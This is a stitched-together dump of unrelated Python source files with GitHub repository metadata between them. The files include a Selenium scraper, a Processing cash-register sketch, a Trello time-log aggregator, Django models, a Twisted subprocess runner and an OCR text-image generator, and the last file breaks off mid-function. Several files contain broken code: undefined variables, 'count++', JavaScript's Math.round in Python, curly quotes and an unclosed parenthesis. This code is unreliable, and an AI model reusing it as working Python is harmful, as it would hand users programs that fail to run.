                       Patch(facecolor='black', edgecolor='gray', label='pa', alpha=0.3)]
    plt.legend(handles=legend_elements, frameon=True, facecolor="white", edgecolor="black", framealpha=1,
               labelspacing=0.2, columnspacing=0.6, bbox_to_anchor=(0.2, 1), ncol=2)
    fig.tight_layout()
    plt.savefig("test", pad_inches=0, bbox_inches='tight')
if __name__ == "__main__":
    # Only the basic line-plot demo runs by default; the replot and subplot
    # demos are kept commented for manual experimentation.
    test_plot1()
    # test_replot()
    # test_subplots()
| [
"Peter.WayneChina@gmail.com"
] | Peter.WayneChina@gmail.com |
9fea5106d554cca986c502b31ddb9178c8d34eb1 | 700028cf9125be3aa961c9ad48d0f69afe77ab06 | /4.selenium/step03mypagesearch.py | 1e753392cf9e5d485c8cc16e6493f916157817cb | [] | no_license | Yukyeong-Lee/Crawling | 6d33b5b2e86d2018fb9985e02c776cb5cdcfe1a0 | 50d223d697ace8fcc79ff0604782e8e22f26543a | refs/heads/master | 2023-06-11T20:55:13.318938 | 2021-07-07T02:34:00 | 2021-07-07T02:34:00 | 383,651,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,239 | py |
from selenium import webdriver
import time

# Open the locally served practice page in Chrome.
driver = webdriver.Chrome("c:/driver/chromedriver.exe")
driver.get("http://127.0.0.1:5500/4.selenium/step03mypage.html")
time.sleep(3)

# input tag: the search box is identified by its name attribute.
search_box = driver.find_element_by_name('data')
# Type the query into the search box first...
search_box.send_keys('encore22')
# ...then trigger the page's own search-click helper.
# NOTE(review): execute_script() returns the script's return value (None
# here), not a WebElement, so the original `btn = ...; btn.click()` raised
# AttributeError; the JS helper itself performs the click.
driver.execute_script("searchBarModuleClickForSearch()")
time.sleep(10)
driver.quit()

# NOTE(review): the scraping loop below appears pasted from another
# exercise: `soup` is never defined (it needs something like
# BeautifulSoup(driver.page_source, "html.parser") created BEFORE
# driver.quit() above), and the original used typographic quotes that made
# the whole file a SyntaxError. The quotes are converted to plain ASCII
# quotes here so the module at least parses; `soup` still must be created
# for this section to run.
for i in range(10):
    time.sleep(1)  # 그냥 쉬어감 (just pausing between items)
    proTit = soup.select("div.title-row > div:nth-child(1) > h5.proTit")[i].string
    proPrice = soup.select("div.title-row > div:nth-child(2) > strong.proPrice")[i].text
    proDays = soup.select("div.info-row > div:nth-child(1) > p:nth-child(1)")[i].text
    proDeparture = soup.select("div.info-row > div:nth-child(1) > p:nth-child(2)")[i].text
    proScore = soup.select("div.info-row > div:nth-child(2) > p:nth-child(1)")[i].text
    print("제목: ", proTit)
    print("\n가격: ", proPrice)
    print("\n여행기간: ", proDays)
    print("\n출발날짜: ", proDeparture)
    print("\n점수: ", proScore)
print(“\n-------------------------------------------------------------------“) | [
"eaggo5@naver.com"
] | eaggo5@naver.com |
aba17ae60493775a1cbdd3dc41b31bb2ee9afbcd | 669e9241b02bdaa303fbc2fd4023b90d4d179a59 | /Cash Register/base.py | 272ceeded4ef34a761806bab212fe9e20d79a550 | [] | no_license | benjaminpotter/HatchProjects | 0854cf46ae7c3781468116a5d63b703dd54ae68c | 7f6a948d3474c755d071751b725c059e6c7f3553 | refs/heads/master | 2022-01-28T16:58:03.449073 | 2019-08-16T13:47:30 | 2019-08-16T13:47:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | def setup():
size(400, 400)
# Background grey for the sketch window.
bg_color = color(120, 120, 120)
# Denominations in descending order for greedy change making.
# Bugfix: the list previously ended with 0.5, which is not a coin and broke
# the descending order; 0.05 (the nickel) was clearly intended, since
# draw() rounds the change to the nearest 0.05.
bills_and_coins = [100, 50, 20, 10, 5, 2, 1, 0.25, 0.10, 0.05]
def draw_cash_registerfunction():
    """Draw the static cash-register graphic: body, two displays, and labels."""
    noStroke()
    fill(50, 50, 50)
    rect(50, 50, 300, 220, 0)  # dark register body
    fill(225, 225, 225)
    rect(87, 130, 225, 35, 0)  # "Cost" display panel
    fill(225, 225, 225)
    rect(87, 210, 225, 35, 0)  # "Tendered" display panel
    fill(225, 225, 225)
    textSize(20)
    text("Cash Register", 135, 85)
    textSize(14)
    text("Cost", 90, 120)
    text("Tendered", 90, 200)
def draw():
    """Render one frame: ask for cost/tendered, then draw the change breakdown.

    Bug fixes relative to the original: `count++` (a SyntaxError in Python)
    is now `count += 1`; JavaScript's `Math.round` is replaced with the
    built-in round(); prompt() results (strings) are converted to float
    before arithmetic; and the int values in `res`/`bills_and_coins` are
    converted with str() before concatenation (int + str raised TypeError).
    """
    background(bg_color)
    # The original called draw_cash_register(), which was never defined;
    # call the function by the name it is actually defined under.
    draw_cash_registerfunction()
    noLoop()
    cost = prompt("Input cost", "")
    tendered = prompt("Input tendered amount", "")
    # Round the change owed to the nearest nickel (0.05).
    change = round((float(tendered) - float(cost)) / 0.05) * 0.05
    fill(0, 0, 0)
    text(cost, 95, 152)
    text(tendered, 95, 232)
    res = []
    for i in range(0, 10):
        count = 0
        # Small epsilon guards against float residue (e.g. 0.049999...)
        # refusing the last nickel.
        while change >= bills_and_coins[i] - 1e-9:
            count += 1
            change -= bills_and_coins[i]
        res.append(count)
    answer = ""
    for i in range(0, 10):
        if res[i] > 0:
            answer += str(res[i]) + "x $" + str(bills_and_coins[i]) + "\n"
    text(answer, 70, 325)
| [
"noreply@github.com"
] | noreply@github.com |
aef53ad762073d48b7c956b671dae59d1218a131 | 7d598ef483ecd534f0ebbb3ceb1f0ddc8eb397c9 | /parser.py | f5ceb2d2fd5dcc9736002d31c36b0e99d090b384 | [] | no_license | EconClass/SL | f532659662f05a82d734a2bf347fe14cc74edbcf | 21aedf8ff3e956ef45601fc2f7415b80f91afa11 | refs/heads/master | 2021-05-20T21:29:06.748552 | 2020-04-02T10:28:47 | 2020-04-02T10:28:47 | 252,424,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | if __name__ == "__main__":
text = open('hi.txt')
for line in text:
broken = line.split()
parsed = open('parsed.txt', 'w')
parsed.write(" ".join((broken[1], broken[3]))
# parsed.close()
| [
"zurich.okoren@gmail.com"
] | zurich.okoren@gmail.com |
449af2f51fcf3f2f03a972bcee389a84c1928d64 | 53324bec216becbbae5cd5e6607d1323ac8938e3 | /tremodone.py | eb60b875a9c5abb7cc8a6095b039c9a713e7c923 | [
"MIT"
] | permissive | yellowsoar/tremodone | b09f0c736ab1ab3c06b215194e3fccafe9e51b0a | f09478dfa69ecf35c65059401613b34d03a949de | refs/heads/master | 2021-09-10T18:49:46.845549 | 2018-03-31T02:40:59 | 2018-03-31T02:40:59 | 114,984,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,746 | py | # -*- coding: utf-8 -*-
import csv
import codecs
import decimal
# Input/output file paths: Pomodone time log plus active and archived Trello
# card exports; the merged per-task summary goes to output.csv.
path_pomodone_log = 'pomodone-log.csv'
path_trello_archived = 'Archived trello.csv'
path_trello = 'trello.csv'
path_output = 'output.csv'
rfile_pomodone_log = codecs.open(path_pomodone_log, 'rb', encoding="utf-8")
rfile_trello_archived = codecs.open(
    path_trello_archived, 'rb', encoding="big5")
rfile_trello = codecs.open(path_trello, 'rb', encoding="big5")
csv_pomodone_log = csv.DictReader(rfile_pomodone_log, delimiter=',')
csv_trello_archived = csv.DictReader(rfile_trello_archived, delimiter=',')
csv_trello = csv.DictReader(rfile_trello, delimiter=',')
write_output = codecs.open(path_output, 'w', encoding='utf-8')
# Per-task aggregates, all keyed by the Trello card id parsed from the URL.
dict_task = {} # task name (falls back to the id until Trello supplies a title)
dict_time = {} # total time spent, in seconds
dict_count = {} # number of executions
dict_label = {} # labels
list_test = []
task_date = ""
task_date_temp = ""
count_date = 0  # number of distinct dates seen in the log
# read pomodone logs as dictionary
for temp in csv_pomodone_log:
    # card id: everything after 'c/' in the description's Trello URL
    task_id = temp['description'][temp['description'].find('c/') + 2:]
    if task_date_temp == str(temp['date']):
        pass
    else:
        # a new date — count it as one more work day
        task_date_temp = str(temp['date'])
        count_date += 1
    if len(task_id) == 0:
        continue
    # 'time spent' is formatted HH:MM:SS; convert to total seconds
    task_time = (
        int(temp['time spent'][:2]) * 60 * 60 +
        int(temp['time spent'][3:5]) * 60 +
        int(temp['time spent'][7:]))
    # task id dictionary
    try:
        test = dict_task[task_id]
    except KeyError:
        dict_task[task_id] = task_id
    # accumulate total time spent
    try:
        test = dict_time[task_id]
        task_time_temp = dict_time[task_id]
        dict_time[task_id] = task_time_temp + task_time
    except KeyError:
        dict_time[task_id] = task_time
    # count executions; a long session counts double
    # NOTE(review): this multiplies only the HOURS digits by 3600, so it
    # tests "hour component >= 1" rather than "session > 25 minutes"
    # (1500 s) as the threshold suggests — confirm which was intended.
    if int(temp['time spent'][:2]) * 60 * 60 > 1500:
        counter = 2
    else:
        counter = 1
    try:
        # dict_time[task_id] always exists by now; the KeyError that routes
        # first occurrences to the except branch comes from dict_count lookup
        test = dict_time[task_id]
        task_count_temp = dict_count[task_id]
        dict_count[task_id] += counter
    except KeyError:
        dict_count[task_id] = counter
    # labels (placeholder until Trello data supplies real labels)
    try:
        test = dict_label[task_id]
    except KeyError:
        dict_label[task_id] = task_id
    try:
        list_test.index(task_id)
    except ValueError:
        list_test.append(task_id)
# Fill in real titles/labels from the archived Trello export; archived titles
# carry a '[...] ' prefix which is stripped here.
for temp in csv_trello_archived:
    task_id = temp['Card URL'][temp['Card URL'].find('c/') + 2:]
    if len(task_id) == 0:
        continue
    try:
        test = dict_task[task_id]
        task_title = temp['Title'][temp['Title'].find('] ') + 2:]
        task_label = temp['Labels']
        # item
        dict_task[task_id] = task_title
        dict_label[task_id] = task_label
    except KeyError:
        pass
# Same for the active Trello export (titles used as-is).
for temp in csv_trello:
    task_id = temp['Card URL'][temp['Card URL'].find('c/') + 2:]
    try:
        test = dict_task[task_id]
        task_title = temp['Title']
        task_label = temp['Labels']
        # item
        dict_task[task_id] = task_title
        dict_label[task_id] = task_label
    except KeyError:
        pass
# CSV header row (Chinese column names: id, task, total seconds/minutes/
# hours/days, work days consumed, share of all work days, execution count,
# executions per day, labels).
write_output.write('id,工項,總工時(秒),總工時(分),總工時(時),總工時(日),\
佔用工作日,總工作日佔比,執行次數,日均執行,標籤\n')
def wfile_output(task_id, task, time, count, labels):
    """Write one double-quoted CSV row for a single task to the output file.

    Columns: id, task name, total seconds/minutes/hours/days, work days
    consumed, share of all work days, execution count, per-day average,
    labels.  Relies on the module-level ``write_output`` handle and the
    ``time_avg_mins`` / ``count_date`` aggregates computed elsewhere.
    """
    two_places = decimal.Decimal('0.01')
    minutes = time / 60
    cells = [
        str(task_id),                                                   # id
        str(task),                                                      # task name
        str(time),                                                      # total seconds
        str(decimal.Decimal(minutes).quantize(two_places)),             # total minutes
        str(decimal.Decimal(minutes / 60).quantize(two_places)),        # total hours
        str(decimal.Decimal(minutes / 60 / 24).quantize(two_places)),   # total days
        str(decimal.Decimal(minutes / time_avg_mins).quantize(
            two_places)),                                               # work days consumed
        str(decimal.Decimal(minutes / time_avg_mins / count_date).quantize(
            decimal.Decimal('0.0001'))),                                # share of all work days
        str(count),                                                     # execution count
        str(decimal.Decimal(count / count_date).quantize(two_places)),  # per-day average
        str(labels),                                                    # labels
    ]
    write_output.write(','.join('"%s"' % cell for cell in cells) + '\n')
# Grand totals: sum all recorded seconds, then derive the average work-day
# length in minutes/hours across the distinct dates counted above.
# NOTE(review): under Python 2 (suggested by the 'rb' + codecs reading style)
# '/' on two ints floors — time_avg_mins would be an int; confirm interpreter.
time_total_secs = 0
for temp in dict_task:
    time_total_secs += dict_time[temp]
time_avg_mins = time_total_secs / 60 / count_date
time_avg_hours = time_total_secs / 60 / 60 / count_date
# Emit one summary row per task.
for temp in dict_task:
    wfile_output(
        temp,
        dict_task[temp],
        dict_time[temp],
        dict_count[temp],
        dict_label[temp])
| [
"yellowsoar@gmail.com"
] | yellowsoar@gmail.com |
93bc6d8993dfb57f569277ac860c68e7241e20c4 | 8bf1fbd200d945d48a10e3a046fd971420d8dbcd | /sorter.py | 86b114243d6ada4f41df7dba5c1d842e973702f9 | [] | no_license | o5prey/forming-train-and-test.txt-files-for-yolo-training | af869001db39bd71d73f27b81039ed9df4ddd499 | ff72d4dcbdd45cfe09f34b4b6064422121379403 | refs/heads/master | 2020-06-01T10:51:17.661722 | 2019-06-07T14:21:34 | 2019-06-07T14:21:34 | 190,755,165 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | #jpg sorter
import os
import glob
import sys
# Rename every file in the dataset folder to a sequential "<n>.jpg" name.
path='C:/Users/EMRE/Desktop/uav_dataset/' # path to the folder containing the images — change this (e.g. C:/Users/EMRE/Desktop/pytorch-yolo-v3-master_env/imgs/)
print(path)
# NOTE(review): duplicates the literal above instead of reusing `path`.
files=os.listdir("C:/Users/EMRE/Desktop/uav_dataset/") # same folder as above — change this too
print(len(files))
i=0
for filename in files:
    # `i-0` is just `i`; files are renamed in listing order to 1.jpg, 2.jpg, ...
    # (non-image files would also get a .jpg extension — confirm folder content)
    src=path+files[i-0]
    print(src)
    dst=path+str(i+1)+'.jpg'
    print(dst)
    os.rename(src,dst)
    i=i+1
# Earlier draft kept for reference:
#import os
#def main():
#i = 0
#for filename in os.listdir("xyz"):
#    dst ="Hostel" + str(i) + ".jpg"
#    src ='xyz'+ filename
#    dst ='xyz'+ dst
#    os.rename(src, dst)
#    i += 1
#if __name__ == '__main__':
#    main()
| [
"noreply@github.com"
] | noreply@github.com |
56adc44a220818826ab3e98736c808a4b246d7cb | f397db52cd2a0b6789c93887c581f68d48056fff | /Testscrape/viictr/viictr/spiders/viictrbot.py | 51a6da68d9d5a1966e3b4c0535cc81039287a564 | [] | no_license | rishitha957/Web-scraping | 8c2031c24bef6c3695116b6b3ed299d6467fb03d | 2a603b0e3a37df478fc6dc4d83bb04254cfab71a | refs/heads/master | 2020-05-25T20:33:48.013956 | 2019-06-07T07:28:47 | 2019-06-07T07:28:47 | 187,978,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,593 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 28 12:48:44 2019
@author: rishitha
"""
import scrapy
import selenium
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.select import Select
from PIL import Image
import pytesseract
class ViictrbotSpider(scrapy.Spider):
    """Crawl the VIICTR people-search results and scrape each profile page.

    parse() fans out over the 93 paginated result URLs, parse1() follows
    every profile link on a results page, and parse2() extracts the
    person's details from an individual profile page.
    """
    name = 'viictrbot'
    #allowed_domains = ['https://profiles.viictr.org/search/default.aspx?searchtype=people']
    start_urls = ['https://profiles.viictr.org/search/']
    def parse(self, response):
        """Yield one request per search-results page (pages 1..93)."""
        url1 = "https://profiles.viictr.org/search/default.aspx?searchtype=people&searchfor=&exactphrase=false&perpage=100&offset=0&page=81&totalpages=93&searchrequest=A81BSfTwU3GNm4liSODkW6vB3EBYO6gz+a5TY1bFhuz1tc7ngL4Orww3064KoquGaRdozjhWRGlrnur5IbaEcMH3TeE05jmp/c7agcYTrzG/rrN5T5p39rbdUtWdCA0xO6jz/+zNo8xTen6DVgqqi0W/y1wHaBbEaTD7d+ObAfEiPSt4sYkjfpHHCVWp3IgQjZuJYkjg5FtrbjF9BEDCXidTb5mQuzDHyB9Btw8xWu2KulNUp49QuXYgzDfXM/0XsMVgFPQNiicDoJOpif4f2tJz+lXwtXBUlbMMfLafD2/FQk/vlQFoQtTytKqtEzKxt8of3H04IOI=&sortby=&sortdirection=&showcolumns=1"
        for i in range(1,94):
            # Splice the page number into the template URL.
            # NOTE(review): assumes the page number occupies exactly indices
            # 121-122 of url1 — extremely fragile; confirm before reuse.
            url = url1[:121]+str(i)+url1[123:]
            yield scrapy.Request(url,callback=self.parse1)
    def parse1(self,response):
        """Follow every profile link found on a search-results page."""
        link = response.xpath("//a[@class='listTableLink']/@href").extract()
        for url in link:
            yield scrapy.Request(url,callback=self.parse2)
    def parse2(self,response):
        """Scrape name/title/institution/department from a profile page."""
        list1 = []
        name = response.css(".pageTitle span::text").extract()
        list1.append(name)
        title = response.css(".basicInfo tr:nth-child(1) span::text").extract()
        list1.append(title)
        institution = response.css("tr+ tr span::text").extract()
        list1.append(institution)
        dep1 = response.css("#ctl00_divProfilesContentMain tr:nth-child(3) td::text").extract()
        department = []
        # every third cell holds a department name
        for i in range(0,len(dep1),3):
            department.append(dep1[i])
        list1.append(department)
        # E-mail addresses are rendered as images; OCR attempt kept for reference:
        #email_l = response.css(".basicInfo img::attr(src)").extract()
        #email = []
        #for i in email_l:
            #str1 = pytesseract.image_to_string(i,lang='eng')
            #email.append(str1)
        # assumes the four selector lists are index-aligned per person — confirm
        for i in range(len(name)):
            yield{
                'name':list1[0][i],
                'title':list1[1][i],
                'institution':list1[2][i],
                'department':list1[3][i],
            }
| [
"noreply@github.com"
] | noreply@github.com |
a23765fe96a6a43414cd28496a7065f7645e2f32 | 70042b2571b920da8864771c94296e6f6a895421 | /Repairs/models.py | 23b012ffd426937c6c423a464021f2890879cc18 | [] | no_license | hasalioma2/djangoNew | 83a596765092dfc09be9ca0c23bd80ea9b00bfee | 44cc769d7f7ebd15878b6f55c5071d0f4a5329ca | refs/heads/master | 2023-04-02T10:41:27.387909 | 2021-04-12T12:17:45 | 2021-04-12T12:17:45 | 357,124,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | from django.db import models
class Vendor(models.Model):
    """A vendor that repair deliveries can be dispatched to."""
    # VendorId = models.IntegerField(primary_key=True)
    name = models.CharField(max_length=200)
    def __str__(self):
        # Shown in the admin and wherever the object is rendered as text.
        return self.name
class Assets(models.Model):
    """A physical asset (piece of equipment) that may be sent out for repair."""
    # assetId = models.IntegerField(primary_key=True)
    model = models.CharField(max_length=200)
    make = models.CharField(max_length=200)
    description = models.CharField(max_length=200)
    # NOTE(review): 'Value' breaks the lowercase naming of the other fields;
    # renaming would require a migration, so it is left as-is.
    Value = models.IntegerField()
    def __str__(self):
        return self.description
class Delivery(models.Model):
    """One dispatch of assets to a vendor on a given date."""
    # deliveryId = models.IntegerField(primary_key=True)
    transDate = models.DateField('Date Dispatched')
    staff = models.CharField(max_length=200)
    toLocation=models.ForeignKey(Vendor, on_delete=models.CASCADE)
    def __str__(self):
        # Deliveries have no natural name; show the auto primary key.
        return str(self.id)
class AssetTrans(models.Model):
    """A line item on a delivery: one asset, its quantity and shipping state."""
    delivery=models.ForeignKey(Delivery, on_delete=models.CASCADE)
    assetId= models.ForeignKey(Assets, on_delete=models.CASCADE)
    qty = models.IntegerField(null=True, blank=True)
    transDate = models.DateField('Date Dispatched')
    shipped = models.BooleanField(default=False)
    received = models.BooleanField(default=False)
"“hasalioma@gmail.com”"
] | “hasalioma@gmail.com” |
8ebc06ef30a7723e5ccdac18c322c90c8fac7485 | dc9cef0a654ba5bf613501c0f11c110231aace18 | /easysteps/assign.py | afa552e6b99e0a85abdb5c6063de71be522fad1a | [] | no_license | mxt123/getstartpython | 36e297b9b20a9a7942e87f691f13c965c417ca7b | 70bf3f4775967449fc7590bbfa470fb6ff5c3b64 | refs/heads/master | 2021-01-10T19:03:08.035051 | 2019-01-20T16:29:58 | 2019-01-20T16:29:58 | 40,926,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | a = 8
b = 4
# Print both values on one line; the tabs line the output up in columns.
print('assign values:\t\t','a = ',a,'\tb =',b)
| [
"="
] | = |
4077f2c69b513dfbb09a6279cfbd85f564d84ab5 | 9f9ec8bebfe8b7ac8e60dcaa23153abe976585e6 | /dataCommons/postingAPI/tasks.py | 1ade94032b03b28ce48f6ba157446b40d942de40 | [] | no_license | erikwestra/data-commons | bbf32cd9b4b64ace28bcb049190d8272a23ed891 | e3ed33fad104157ff505bb02bc7ae981f8ba3b11 | refs/heads/master | 2020-04-11T12:03:19.996644 | 2013-02-14T17:08:24 | 2013-02-14T17:08:24 | 8,188,655 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,043 | py | """ dataCommons.postingAPI.tasks
This module implements the background tasks run by the Celery task queuing
system.
"""
import logging
from celery import task
from dataCommons.shared.lib.decorators import print_exceptions_to_stdout
from dataCommons.postingAPI import postingProcessor
#############################################################################
logger = logging.getLogger(__name__)
#############################################################################
@task()
@print_exceptions_to_stdout
def process_postings(parsed_postings):
    """ Process the given set of postings.

        Note that we simply call the posting processor to do all the work, but
        wrap it up in a Huey command so that the work is queued, and use the
        'print_exceptions_to_stdout' decorator so that any exceptions will be
        logged to stdout rather than written to the Huey log file (which won't
        exist when the system is deployed to Heroku).
    """
    # NOTE(review): the docstring above says "Huey", but this module imports
    # Celery's @task decorator — the documentation looks stale; confirm.
    # parsed_postings: the already-parsed postings handed straight through to
    # the posting processor.
    postingProcessor.process_postings(parsed_postings)
| [
"ewestra@gmail.com"
] | ewestra@gmail.com |
84a8d7587333beacb530ca0dc5bd8c795e393d3a | 5cb29431ecbba7b61463c67749794b54201907e1 | /pelicide/runner.py | 688ba9e582ad94aeb3dcda92e73a6b397e49a1ed | [] | no_license | iksteen/pelicide | 6a9a88a1fe2df6acb271c465942820ab76ccfa82 | 5b8a6a919257840fafdcab5c886c81a72b18a6c0 | refs/heads/master | 2021-05-16T02:39:52.910803 | 2016-01-06T11:40:51 | 2016-01-06T11:40:51 | 34,100,676 | 16 | 2 | null | 2019-10-22T23:49:10 | 2015-04-17T06:35:34 | HTML | UTF-8 | Python | false | false | 2,958 | py | import json
import os
import sys
from twisted.internet import defer, protocol
class RunnerProtocol(protocol.ProcessProtocol):
    """Line-oriented protocol for talking to the pelican-runner subprocess.

    Requests go to the child's stdin as one line per command:
    '<seq> <command> <json-args>'.  Responses arrive on stdout as
    '<seq> <+|-> <json-args>' lines, where '+' marks success.
    """
    def __init__(self, callback):
        # callback(seq, success, args) is invoked for every completed request.
        self.callback = callback
        self.seq = 0           # last sequence number handed out
        self.buffer = ''       # partial stdout line awaiting its newline
        self.pending = set()   # sequence numbers still awaiting a response
    def sendCommand(self, command, args=None):
        """Send one command to the child; return its sequence number."""
        self.seq += 1
        self.pending.add(self.seq)
        self.transport.write('%d %s %s\n' % (self.seq, command, json.dumps(args)))
        return self.seq
    def outReceived(self, data):
        # Accumulate stdout and hand off every complete line.
        self.buffer += data
        while '\n' in self.buffer:
            response, self.buffer = self.buffer.split('\n', 1)
            self.process_response(response)
    def process_response(self, response):
        """Parse one response line and complete the matching request."""
        seq, result, args = response.split(' ', 2)
        seq = int(seq)
        if seq in self.pending:
            self.pending.remove(seq)
            args = json.loads(args)
            if self.callback is not None:
                self.callback(seq, result == '+', args)
    def processExited(self, reason):
        # Fail every outstanding request when the subprocess dies.
        # NOTE(review): unlike process_response() this does not guard against
        # self.callback being None — confirm a callback is always installed
        # before the process can exit.
        pending, self.pending = self.pending, set()
        while pending:
            self.callback(pending.pop(), False, reason)
class Runner(object):
    """Manage the pelican-runner.py subprocess and issue commands to it.

    Each command returns a twisted Deferred that fires with the response
    args on success or errbacks with a RuntimeError on failure.
    """
    def __init__(self, python, config_path, settings, **kwargs):
        # Allow a reactor to be injected for tests; default to the global one.
        reactor = kwargs.get('reactor')
        if reactor is None:
            from twisted.internet import reactor
        self.reactor = reactor
        self.python = python              # python interpreter to launch
        self.config_path = config_path    # pelican config passed to the child
        self.init_settings = settings     # settings serialized onto argv
        self.settings = None              # settings reported back by the child
        self.d = None                     # Deferred fired once startup completes
        self.pending = {}                 # command id -> Deferred
    def start(self):
        """Spawn the pelican-runner child process; return a startup Deferred."""
        self.d = defer.Deferred()
        runner = os.path.join(os.path.dirname(__file__), 'pelican-runner.py')
        protocol = RunnerProtocol(self.responseReceived)
        # Wire the child's stdin/stdout to the protocol; stderr goes straight
        # to our own stderr.
        self.transport = self.reactor.spawnProcess(
            protocol,
            self.python,
            [
                self.python,
                runner,
                self.config_path,
                json.dumps(self.init_settings),
            ],
            env=None,
            childFDs={
                0: 'w',
                1: 'r',
                2: sys.stderr.fileno(),
            },
        )
        return self.d
    def restart(self):
        """Ask the child to quit, then start a fresh one."""
        return self.command('quit').addCallback(lambda _: self.start())
    def command(self, command, args=None):
        """Send a command to the child; return a Deferred for its response."""
        if self.transport.proto is None:
            # The child has gone away; relaunch it first.
            self.start()
        command_id = self.transport.proto.sendCommand(command, args)
        d = defer.Deferred()
        self.pending[command_id] = d
        return d
    def responseReceived(self, command_seq, success, args):
        """Route a child response to the Deferred awaiting it."""
        if command_seq == 0:
            # Sequence 0 is the unsolicited startup message carrying settings.
            self.settings = args
            if self.d:
                self.d.callback(args)
                self.d = None
            return
        d = self.pending.pop(command_seq)
        if success:
            d.callback(args)
        else:
            d.errback(RuntimeError(args))
| [
"iksteen@gmail.com"
] | iksteen@gmail.com |
91f97b42b730af6c6b6353f404a643529440cf94 | 864bb85e9f5b86843e630d2b7b6291715385e367 | /hdf5/synthetic/1_toy_syn.py | 24872d29f105cbf4c71daa84c56baf66026383f0 | [] | no_license | Littlehead27/Keras_text_recognition_ocr | 2ec2760170e80a667ce07f5ac5948f66be1eb896 | f46faf3e7e8e7b21d6cb8b8885e04b2c734a7e16 | refs/heads/master | 2020-07-21T21:53:37.215891 | 2019-05-17T08:02:51 | 2019-05-17T08:02:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,524 | py | # -*- coding:utf8 -*-
"""
功能:将语料中的每行文本绘制成图像
输入:语料文件
输出:文本图像
参数:在config.cfg.py中: config_path, corpus, dict, FONT_PATH
"""
import codecs
import numpy as np
import mycrnn_pc.config.cfg as cfg
import os
from PIL import Image, ImageDraw, ImageFont
import progressbar
import glob
def add_noise(raw_img):
    """Overlay Rayleigh-distributed noise on a 2-D image.

    Draws a random overall noise strength and a random Rayleigh scale, adds
    the normalized noise field to the image, and rescales the result so its
    maximum value is 255.

    :param raw_img: 2-D image array (H x W)
    :return: noisy image as a float ndarray whose maximum is 255
    """
    height, width = raw_img.shape[0], raw_img.shape[1]
    # Random strength in [10.0, 650.0) and Rayleigh scale in [0.1, 5.0).
    strength = np.random.randint(100, 6500) * 0.1
    ray_scale = np.random.randint(1, 50) * 0.1
    field = np.random.rayleigh(ray_scale, (height, width))
    # Normalize the field, then stretch it to the chosen grey-level range.
    field = field / field.max() * strength
    combined = raw_img.copy() + field
    return combined / combined.max() * 255
class TextGenerator():
    """Render each line of a text corpus into a fixed-size image for CRNN/CTC
    training, and write a filename -> label-id-sequence mapping file."""
    def __init__(self, input_shape, save_path):
        """Initialise from the cfg config module; input_shape is (h, w, depth).
        """
        self.img_h = input_shape[0]
        self.img_w = input_shape[1]
        self.depth = input_shape[2]
        # corpus parameters
        self.max_row_len = cfg.max_row_len
        self.max_label_len = cfg.max_label_len  # maximum CTC input length
        self.n_samples = cfg.n_samples
        self.dictfile = cfg.dict  # character dictionary file
        self.dict = []
        self.corpus_file = cfg.corpus  # corpus file
        self.save_path = save_path
        # font handling
        self.font_factor = 1  # intended to control font size (unused in this class)
        # load the font files
        self.load_fonts()
        # load the corpus
        self.build_dict()
        self.build_train_list(self.n_samples, self.max_row_len)
    def load_fonts(self):
        """ Load the font files and prepare several sizes of each.
        TODO: no need to fix sizes by hand — let Pillow handle it
        :return: self.fonts
        """
        self.fonts = {}  # all fonts
        self.font_name = []  # font names, used to index self.fonts
        # full glob pattern for the font directory
        font_path = os.path.join(cfg.FONT_PATH, "*.*")
        # collect all font paths into a list
        fonts = list(glob.glob(font_path))
        # iterate over the font files
        for each in fonts:
            # font sizes
            fonts_list = {}  # the different sizes of one font
            # NOTE(review): splitting on '\\' assumes Windows paths — confirm.
            font_name = each.split('\\')[-1].split('.')[0]  # font name
            self.font_name.append(font_name)
            font_size = 25
            for j in range(0, 10):  # the sizes of the current font (25 down to 16)
                # adjust the font size
                cur_font = ImageFont.truetype(each, font_size, 0)
                fonts_list[str(j)] = cur_font
                font_size -= 1
            self.fonts[font_name] = fonts_list
    def build_dict(self):
        """ Open the dictionary file and load every character into a list.
        One character per line.
        :return: self.dict
        """
        with codecs.open(self.dictfile, mode='r', encoding='utf-8') as f:
            # read the corpus line by line
            for line in f:
                # strip the trailing newline of the current line
                word = line.strip('\r\n')
                # keep appending as long as the limit is not exceeded
                self.dict.append(word)
        # the final class index serves as the blank placeholder
        self.blank_label = len(self.dict)
    def mapping_list(self):
        # Write the image-filename -> class-id-sequence mapping table.
        file_path = os.path.join(cfg.DATASET_DIR, 'map_list.txt')
        with codecs.open(file_path, mode='w', encoding='utf-8') as f:
            for i in range(len(self.train_list)):
                # filename, class-id sequence
                label_sequence = self.label_sequence[i].tolist()
                f.write("{}.png,{}\n".format(
                    i, ' '.join(str(e) for e in label_sequence)))
    def build_train_list(self, n_samples, max_row_len=None):
        # Filter the corpus and keep suitable lines as the training list.
        print('正在加载语料...')
        assert max_row_len <= self.max_label_len  # maximum label-sequence length
        self.n_samples = n_samples  # total number of corpus lines
        sentence_list = []  # holds each corpus line
        self.train_list = []
        self.label_len = [0] * self.n_samples  # label-sequence lengths
        self.label_sequence = np.ones([self.n_samples, self.max_label_len]) * -1  # class-id sequences (-1 padded)
        with codecs.open(self.corpus_file, mode='r', encoding='utf-8') as f:
            # read the corpus line by line
            for sentence in f:
                sentence = sentence.strip()  # drop the trailing newline
                if len(sentence_list) < n_samples:
                    # keep adding lines until the sample budget is reached
                    sentence_list.append(sentence)
        np.random.shuffle(sentence_list)  # shuffle the corpus
        if len(sentence_list) < self.n_samples:
            raise IOError('语料不足')
        # iterate over every sentence (line) of the corpus
        for i, sentence in enumerate(sentence_list):
            # length of this sentence
            label_len = len(sentence)
            filted_sentence = ''
            # split the sentence into characters and map each one to its
            # integer id; row i of label_sequence holds those ids
            label_sequence = []
